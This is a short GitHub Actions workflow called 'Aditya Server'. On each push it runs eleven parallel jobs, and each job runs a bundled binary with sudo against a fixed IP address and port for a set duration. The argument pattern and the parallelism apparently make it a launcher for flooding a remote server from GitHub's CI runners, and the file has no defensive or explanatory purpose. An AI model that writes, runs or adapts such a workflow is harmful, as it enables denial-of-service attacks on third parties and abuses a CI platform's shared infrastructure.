name: Aditya Server
on: [push]

jobs:
  aditya:
    runs-on: ubuntu-22.04
    
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11]
        
    steps:
      - uses: actions/checkout@v4
      
      - run: chmod +x aditya
      - run: sudo ./aditya 91.108.9.138 32001 60
    